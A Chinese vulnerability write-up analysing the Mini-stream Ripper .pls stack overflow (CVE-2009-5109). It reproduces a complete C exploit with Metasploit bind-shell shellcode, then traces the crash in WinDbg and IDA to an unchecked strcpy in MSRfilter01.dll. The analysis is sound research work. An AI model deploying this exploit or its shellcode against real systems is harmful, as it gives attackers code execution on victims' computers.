Mini-STREAM RIPPER .pls缓冲区溢出漏洞(CVE-2009-5109)

作者:k0shl 转载请注明出处 作者博客地址:http://whereisk0shl.top


漏洞说明


软件下载:
https://www.exploit-db.com/apps/ff609955485ea7bd71d403c330a946aa-Mini-streamRipper.exe

PoC:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
 
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum 
   http://metasploit.com */
 
unsigned char shell[] = 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a";
 
int main ( int argc , char * argv[])
{
    FILE* expfle= NULL;
    char* EIP = "\x53\x93\x42\x7e"; // jmp esp -> user32.dll
    int i;
 
    printf("\t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .\r\n");
    printf("\t          -------> now upload the .pls file to a remote server <-------\n");
 
 
    if( (expfle=fopen("mini-stream-ripper.pls","wb")) ==NULL )
    {
         perror("Cannot create the exploit file!!! :(");
         exit(0);
    }
 
                for (i=0; i<17405; i++)
                {
                    fwrite("\x41", 1, 1, expfle); // Junk
                }
 
                fwrite(EIP, 4, 1, expfle); // ret
 
                for (i=0; i<10; i++)
                {
                    fwrite("\x90", 1, 1, expfle); // Nop's
                }
         
        fwrite(shell, sizeof(shell), 1, expfle); // write the shell
 
        for (i=0; i<16702; i++)
                {
                    fwrite("\xcc", 1, 1, expfle); // finish off buffer
                }
 
                fclose(expfle);
 
                printf("[+] mini-stream-ripper.pls Created successfully! \r\n");
                printf("[+] Exploited by mr_me \r\n");
 
    return 0;
 
}

调试环境:
Windows xp sp3

这个PoC是C语言的,可以用VC6.0进行编译,同样会生成一个.pls文件,然后直接用Mini-stream RIPPER打开,就能够触发漏洞了,不过这个PoC包含shellcode,如果想正常引发crash的话,可以把相关的跳转,shellcode等部分的内容直接修改成畸形字符串,比如"\x41"即可。


漏洞复现


此漏洞是由于Ripper.exe对于.pls文件处理时,没有对文件内容的长度进行长度检查,从而在MSRfilter01.dll中处理文件时拷贝了异常字符串,导致了缓冲区溢出,当使用函数sub_42B840时,由于超长字符串覆盖了缓冲区,从而导致了漏洞的发生。

我们生成一个样本文件,打开ripper.exe,加载样本文件,附加windbg,到达漏洞现场。

0:010> g
(304.e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
90909090 ??              ???

这时我们使用kb回溯堆栈调用。

0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
000f7294 90909090 90909090 90909090 41909090 0x90909090
000fbfb4 00000000 00000000 00000000 00000000 0x90909090

发现此时堆栈已经被完全破坏了,没法通过堆栈调用来回溯漏洞现场,我们重新观察poc,当程序打开时,应该会调用fopen,我们通过ida pro重新查找关键函数fopen,得到下面四处调用。

.text:0045B6F7                 call    ds:fopen
.text:00446E37                 call    ds:fopen
.text:00446232                 call    ds:fopen
.text:00429636                 call    ds:fopen

漏洞分析


我们在这四处调用下断点。

0:010> bp 0045B6F7
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
0:010> bp 00446E37
0:010> bp 00446232
0:010> bp 00429636

重新加载程序,附加样本后程序在一处fopen中断,为了确认这处调用,我们直接继续运行,发现到达漏洞位置。

0:010> bl
 0 e 0045b6f7     0001 (0001)  0:**** Ripper+0x5b6f7
 1 e 00446e37     0001 (0001)  0:**** Ripper+0x46e37
 2 e 00446232     0001 (0001)  0:**** Ripper+0x46232
 3 e 00429636     0001 (0001)  0:**** Ripper+0x29636
0:010> g
Breakpoint 3 hit
eax=00000000 ebx=000fbbd4 ecx=004842ac edx=000f2f3a esi=00000000 edi=0047f7c8
eip=00429636 esp=000f7290 ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x29636:
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 
00429636 ff15d4aa4600    call    dword ptr [Ripper+0x6aad4 (0046aad4)] ds:0023:0046aad4={msvcrt!fopen (77c0f010)}
0:000> g
(108.7dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
90909090 ??              ???

因此我们可以确定这处call调用是关键调用,我们重新附加,直接到达这处call fopen调用。

0:010> bp 00429636
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
0:010> g
Breakpoint 0 hit
eax=00000000 ebx=000fbbd4 ecx=004842ac edx=000f2f3a esi=00000000 edi=0047f7c8
eip=00429636 esp=000f7290 ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x29636:
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 
00429636 ff15d4aa4600    call    dword ptr [Ripper+0x6aad4 (0046aad4)] ds:0023:0046aad4={msvcrt!fopen (77c0f010)}
0:000> dd esp
000f7290  000fbbd4 0047f794 00000001 00000000

这时我们看看fopen的第一个参数

0:000> dc poi(esp)
000fbbd4  445c3a43 6d75636f 73746e65 646e6120  C:\Documents and
000fbbe4  74655320 676e6974 64415c73 696e696d   Settings\Admini
000fbbf4  61727473 5c726f74 73617263 702e3268  strator\crash2.p
000fbc04  0000736c 00000014 00000001 00000000  ls

确实是打开样本文件的操作,接下来,我们进行单步跟进。

0:000> p
eax=00000001 ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3
eip=00429856 esp=000f7294 ebp=000fbfb4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
Ripper+0x29856:
00429856 e8e51f0000      call    Ripper+0x2b840 (0042b840)

到达这个位置的时候,单步步过,漏洞被触发,我们查看一下,其实是在这个函数的一个分支逻辑。

mov     ecx, ebp
mov     dword_4BB364, 2
call    sub_4208E0
push    ebx             ; ArgList
mov     ecx, ebp
call    sub_42B840

在进入这个call调用时,我们来查看一下它的参数,首先来看看这个函数定义。

signed int __userpurge sub_42B840<eax>(int a1<eax>, const char *ArgList)

定义了一个指针,和一个整数变量,这个指针实际上是文件路径。

0:000> dd esp
000f7294  000fbbd4 00000001
0:000> dc poi(esp)
000fbbd4  445c3a43 6d75636f 73746e65 646e6120  C:\Documents and
000fbbe4  74655320 676e6974 64415c73 696e696d   Settings\Admini
000fbbf4  61727473 5c726f74 73617263 702e3268  strator\crash2.p
000fbc04  0000736c 00000014 00000001 00000000  ls

我们进入这个函数,单步跟踪,在即将到达ret的时候,我们看到了如下指令,以及内存变化。

eax=00000000 ebx=00000000 ecx=00000461 edx=000008c3 esi=00000001 edi=00f056f8
eip=0042ba8b esp=000ee94c ebp=00f07a04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba8b:
0042ba8b 8b8c2438890000  mov     ecx,dword ptr [esp+8938h] ss:0023:000f7284=b87b4141
0:000> dd esp+8938
000f7284  b87b4141 45530146 ffffffff 90909090
000f7294  90909090 90909090 90909090 90909090
000f72a4  41909090 41414141 41414141 41414141
000f72b4  41414141 41414141 41414141 41414141
000f72c4  41414141 41414141 41414141 41414141
000f72d4  41414141 41414141 41414141 41414141
000f72e4  41414141 41414141 41414141 41414141

可以看到此时esp对应地址已经被畸形字符串覆盖了,那么接下来。

0:000> p
eax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=00000001 edi=00f056f8
eip=0042ba92 esp=000ee94c ebp=00f07a04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba92:
0042ba92 5f              pop     edi
0:000> p
eax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=00000001 edi=000066c3
eip=0042ba93 esp=000ee950 ebp=00f07a04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba93:
0042ba93 5e              pop     esi
0:000> p
eax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042ba94 esp=000ee954 ebp=00f07a04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba94:
0042ba94 5d              pop     ebp
0:000> p
eax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042ba95 esp=000ee958 ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba95:
0042ba95 5b              pop     ebx
0:000> p
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042ba96 esp=000ee95c ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba96:
0042ba96 64890d00000000  mov     dword ptr fs:[0],ecx fs:003b:00000000=000f7284
0:000> p
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042ba9d esp=000ee95c ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba9d:
0042ba9d 81c434890000    add     esp,8934h
0:000> p
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042baa3 esp=000f7290 ebp=000fbfb4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
Ripper+0x2baa3:
0042baa3 c20400          ret     4
0:000> p
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
90909090 ??              ???

连续的pop之后,栈退出,返回后指向了90909090这个地址,可控,从而能达到控制eip执行任意代码的目的。

那么我们需要知道何时栈被畸形字符串覆盖,但是经过分析sub_42B840这个函数内部很大,我们需要快速定位到内存被覆盖的时刻,这样我们可以使用ba命令,在存在问题的位置下断点,首先我们进入这个函数时,可以观察内存空间。

0:000> p
eax=00008928 ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3
eip=0042b85a esp=000f7284 ebp=000fbfb4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
Ripper+0x2b85a:
0042b85a e8f1600300      call    Ripper+0x61950 (00461950)
0:000> p
eax=0042b85f ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3
eip=0042b85f esp=000ee95c ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2b85f:
0042b85f 53              push    ebx
0:000> dd esp+8938
000f7294  000fbbd4 00000001 00000000 7d647c29
000f72a4  00a00054 00000000 00000000 00000000
000f72b4  00000000 00000000 00000000 00000000
000f72c4  00000000 00000000 00000000 00000000
000f72d4  00000000 00000000 00000000 00000000
000f72e4  00000000 00000000 00000000 00000000
000f72f4  00000000 00000000 00000000 00000000
000f7304  00000000 00000000 00000000 00000000

此时esp对应位置存放的还是传入参数,这样我们在000f7294的位置下内存写入断点。

0:000> ba w1 000f7294
0:000> bl
 0 e 00429856     0001 (0001)  0:**** Ripper+0x29856
 1 e 000f7294 w 1 0001 (0001)  0:**** 
0:000> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=00000033 edx=000066ec esi=02ed3548 edi=000f72a4
eip=1000b5e3 esp=000ee930 ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\MSRfilter01.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mini-stream\Mini-stream Ripper\MSRfilter01.dll - 
MSRfilter01!Playlist_FindNextItem+0x53:
1000b5e3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

执行到这一步的时候可以看一下对应位置发生了什么变化。

0:000> p
eax=00000000 ebx=00000000 ecx=00000000 edx=000066ec esi=02ed3614 edi=000f7370
eip=1000b5e5 esp=000ee930 ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x55:
1000b5e5 8bca            mov     ecx,edx
0:000> dd 000f7284
000f7284  b87b4141 45530146 90905958 90909090
000f7294  90909090 90909090 90909090 90909090
000f72a4  41909090 41414141 41414141 41414141
000f72b4  41414141 41414141 41414141 41414141
000f72c4  41414141 41414141 41414141 41414141
000f72d4  41414141 41414141 41414141 41414141
000f72e4  41414141 41414141 41414141 41414141

那么可以看到此时内存已经被覆盖了,那么我们需要再次回溯,看看000f7294到底是什么原因被修改的。

这个函数处于MSRfilter01.dll中,我们重新来看一下这个函数的过程。

signed int __cdecl Playlist_FindNextItem(char *a1)
{
  const char *v1; // eax@1
  signed int result; // eax@2

  sub_1000B630(
    5,
    "Debug: Playlist_FindNextItem enter. %s(%u)",
    (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c");
  v1 = (const char *)sub_10008CC0(dword_10063BA0, 1);
  if ( v1 )
  {
    strcpy(a1, v1);
    sub_1000B630(
      5,
      "Debug: Playlist_FindNextItem ok. %s(%u)",
      (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c");
    result = 1;
  }
  else
  {
    sub_1000B630(
      5,
      "Debug: Playlist_FindNextItem NO File return. %s(%u)",
      (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c");
    result = 0;
  }
  return result;
}

可以看到,在v1是eax,而eax正是存放存在漏洞的寄存器,而sub_10008CC0用于获取漏洞指针的值,随后strcpy会将v1拷贝到a1指针中,而就是这个操作没有进行长度检查,导致超长串拷入时会冲垮下面栈中的内容。

这一步可以看到eax经过call函数调用后会被赋予异常串的值

0:010> g
Breakpoint 0 hit
eax=00ee0878 ebx=00000000 ecx=7c93003d edx=00000020 esi=000fbc07 edi=000f50b7
eip=1000b5ae esp=000ee92c ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x1e:
1000b5ae e80dd7ffff      call    MSRfilter01+0x8cc0 (10008cc0)
0:000> dd 000f7284
000f7284  000fbd48 004650db ffffffff 0042985b
000f7294  000fbbd4 00000001 00000000 7d647c29
000f72a4  00a00054 00000000 00000000 00000000
000f72b4  00000000 00000000 00000000 00000000
000f72c4  00000000 00000000 00000000 00000000
000f72d4  00000000 00000000 00000000 00000000
000f72e4  00000000 00000000 00000000 00000000
000f72f4  00000000 00000000 00000000 00000000
0:000> p
eax=02eccf28 ebx=00000000 ecx=00ee08c0 edx=00000000 esi=000fbc07 edi=000f50b7
eip=1000b5b3 esp=000ee92c ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x23:
1000b5b3 83c418          add     esp,18h

紧接着拷贝,造成栈被冲垮。

0:000> p
eax=00000000 ebx=00000000 ecx=000019bb edx=000066ec esi=02eccf28 edi=000f0c84
eip=1000b5e3 esp=000ee930 ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x53:
1000b5e3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> dd 000f7284
000f7284  000fbd48 004650db ffffffff 0042985b
000f7294  000fbbd4 00000001 00000000 7d647c29
000f72a4  00a00054 00000000 00000000 00000000
000f72b4  00000000 00000000 00000000 00000000
000f72c4  00000000 00000000 00000000 00000000
000f72d4  00000000 00000000 00000000 00000000
000f72e4  00000000 00000000 00000000 00000000
000f72f4  00000000 00000000 00000000 00000000
0:000> p
eax=00000000 ebx=00000000 ecx=00000000 edx=000066ec esi=02ed3614 edi=000f7370
eip=1000b5e5 esp=000ee930 ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x55:
1000b5e5 8bca            mov     ecx,edx
0:000> dd 000f7284
000f7284  b87b4141 45530146 90905958 90909090
000f7294  90909090 90909090 90909090 90909090
000f72a4  41909090 41414141 41414141 41414141
000f72b4  41414141 41414141 41414141 41414141
000f72c4  41414141 41414141 41414141 41414141
Comments
Write a Comment